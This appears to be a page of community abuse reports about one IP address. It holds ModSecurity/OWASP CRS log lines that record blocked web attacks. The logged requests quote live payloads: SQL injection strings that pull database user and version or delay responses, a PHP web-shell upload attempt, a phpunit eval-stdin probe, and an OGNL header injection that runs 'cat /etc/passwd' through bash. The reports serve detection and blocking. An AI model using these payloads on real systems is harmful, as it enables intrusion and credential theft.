๐ช๐ธ
el-brujo
2025-05-25 14:26:09
(1 year ago)
25/May/2025:16:26:09.210769 +0200Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client ...
show more
25/May/2025:16:26:09.210769 +0200Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client 146.190.83.235] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's)&1o' [file "/etc/httpd/modsecurity.d/activated_rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "66"] [id "942100"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: s)&1o found within ARGS:username: aaFJ3R') OR 4191=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(50000000/2))))-- vDwl"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.5"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/152/248/66"] [tag "PCI/6.5.2"] [hostname "www.elhacker.info"] [uri "/login.php"] [unique_id "aDMogYoPPf17grjX8e25nAAAAAU"]
...
show less
Hacking
Web App Attack
๐บ๐ธ
mawan
2025-05-25 14:02:59
(1 year ago)
Suspected of having performed illicit activity on LAX server.
Web App Attack
๐บ๐ธ
ipblock.com
2025-05-25 13:42:00
(1 year ago)
IPBlock protected site ID [3192-af][s=06].
Exploit request, vulnerability scanner.
Hacking
Bad Web Bot
Web App Attack
๐ซ๐ท
LRob
2025-05-25 13:00:03
(1 year ago)
WAF repeated trigger detected by Fail2Ban in plesk-modsecurity jail
Web App Attack
๐ช๐ธ
el-brujo
2025-05-25 11:57:17
(1 year ago)
25/May/2025:13:57:16.708585 +0200Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client ...
show more
25/May/2025:13:57:16.708585 +0200Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client 146.190.83.235] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'sUEv,' [file "/etc/httpd/modsecurity.d/activated_rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "66"] [id "942100"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: sUEv, found within ARGS:parent: \\\\x22 UNION SELECT NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),md5(999999999)),NULL,NULL,NULL,NULL,NULL-- aa"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.5"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/152/248/66"] [tag "PCI/6.5.2"] [hostname "www.elhacker.info"] [uri "/plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php"] [unique_id "aDMFnOJAJnbYP_WBCbI-8gAAAFU"]
...
show less
Hacking
Web App Attack
๐บ๐ธ
ipblock.com
2025-05-25 11:03:00
(1 year ago)
IPBlock protected site ID [3192-af][s=02].
Exploit request, vulnerability scanner.
Hacking
Bad Web Bot
Web App Attack
๐ฒ๐พ
Rizzy
2025-05-25 04:11:44
(1 year ago)
Multiple WAF Violations
Brute-Force
Web App Attack
๐ช๐ธ
el-brujo
2025-05-25 03:35:07
(1 year ago)
25/May/2025:05:35:07.225460 +0200Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client ...
show more
25/May/2025:05:35:07.225460 +0200Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client 146.190.83.235] ModSecurity: Warning. detected SQLi using libinjection with fingerprint '1&f(1' [file "/etc/httpd/modsecurity.d/activated_rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "66"] [id "942100"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: 1&f(1 found within ARGS:template_id: 1 and sleep(6)#"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.5"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/152/248/66"] [tag "PCI/6.5.2"] [hostname "www.elhacker.info"] [uri "/wp-admin/admin-ajax.php"] [unique_id "aDKP64oPPf17grjX8e1UaQAAACo"]
...
show less
Hacking
Web App Attack
๐บ๐ธ
ipblock.com
2025-05-25 02:47:00
(1 year ago)
IPBlock protected site ID [3192-af][s=06].
Exploit request, vulnerability scanner.
Hacking
Bad Web Bot
Web App Attack
๐ช๐ธ
el-brujo
2025-05-24 21:17:46
(1 year ago)
24/May/2025:23:17:45.216449 +0200Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client ...
show more
24/May/2025:23:17:45.216449 +0200Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client 146.190.83.235] ModSecurity: Warning. Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/etc/httpd/modsecurity.d/activated_rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "178"] [id "920170"] [msg "GET or HEAD Request with Body Content"] [data "34"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.5"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/210/272"] [hostname "www.elhacker.info"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "aDI3eZltLIDS98h9CCxJDQAAC0Y"]
...
show less
Hacking
Web App Attack
๐ช๐ธ
el-brujo
2025-05-24 19:48:49
(1 year ago)
24/May/2025:21:48:49.201720 +0200Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client ...
show more
24/May/2025:21:48:49.201720 +0200Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client 146.190.83.235] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/etc/httpd/modsecurity.d/activated_rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "703"] [id "920340"] [msg "Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [ver "OWASP_CRS/3.3.5"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/210/272"] [hostname "www.elhacker.info"] [uri "/upload/index.php"] [unique_id "aDIioZltLIDS98h9CCzNZgAAC2Y"]
...
show less
Hacking
Web App Attack
๐ฎ๐ฉ
BPS-StatisticsIndonesia
2025-05-24 18:59:51
(1 year ago)
WP Admin Scan Activities
Web App Attack
๐ช๐ธ
el-brujo
2025-05-24 16:51:28
(1 year ago)
24/May/2025:18:51:28.532212 +0200Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client ...
show more
24/May/2025:18:51:28.532212 +0200Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client 146.190.83.235] ModSecurity: Warning. Pattern match ".*\\\\\\\\.(?:php\\\\\\\\d*|phtml)\\\\\\\\.*$" at FILES:userfile. [file "/etc/httpd/modsecurity.d/activated_rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "108"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: caaacac.php found within FILES:userfile: caaacac.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.5"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/152/242"] [hostname "www.elhacker.info"] [uri "/modules/attributewizardpro/file_upload.php"] [unique_id "aDH5EJltLIDS98h9CCyT_QAAC2I"]
...
show less
Hacking
Web App Attack
๐ช๐ธ
el-brujo
2025-05-24 15:26:57
(1 year ago)
24/May/2025:17:26:56.853883 +0200Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client ...
show more
24/May/2025:17:26:56.853883 +0200Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client 146.190.83.235] ModSecurity: Warning. Match of "rx ^[\\\\\\\\w/.+-]+(?:\\\\\\\\s?;\\\\\\\\s?(?:action|boundary|charset|type|start(?:-info)?)\\\\\\\\s?=\\\\\\\\s?['\\\\"\\\\\\\\w.()+,/:=?<>@-]+)*$" against "REQUEST_HEADERS:Content-Type" required. [file "/etc/httpd/modsecurity.d/activated_rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "933"] [id "920470"] [msg "Illegal Content-Type header"] [data "%{(#test='multipart/form-data').(#[email protected] @default_member_access).(#[email protected] @default_member_access,#cmd=\\\\x22cat /etc/passwd\\\\x22,#cmds={\\\\x22/bin/bash\\\\x22,\\\\x22-c\\\\x22,#cmd},#p=new java.lang.processbuilder(#cmds),#p.redirecterrorstream(true),#process=#p.start(),#b=#process.getinputstream(),#c=new java.io.inputstreamreader(#b),#d=new java.io.bufferedreader(#c),#e=new char[50000],#d.read(#e),#[email protected] @getrespon
...
show less
Hacking
Web App Attack
๐บ๐ธ
ipblock.com
2025-05-24 14:34:00
(1 year ago)
IPBlock protected site ID [3192-af][s=02].
Exploit request, vulnerability scanner.
Hacking
Bad Web Bot
Web App Attack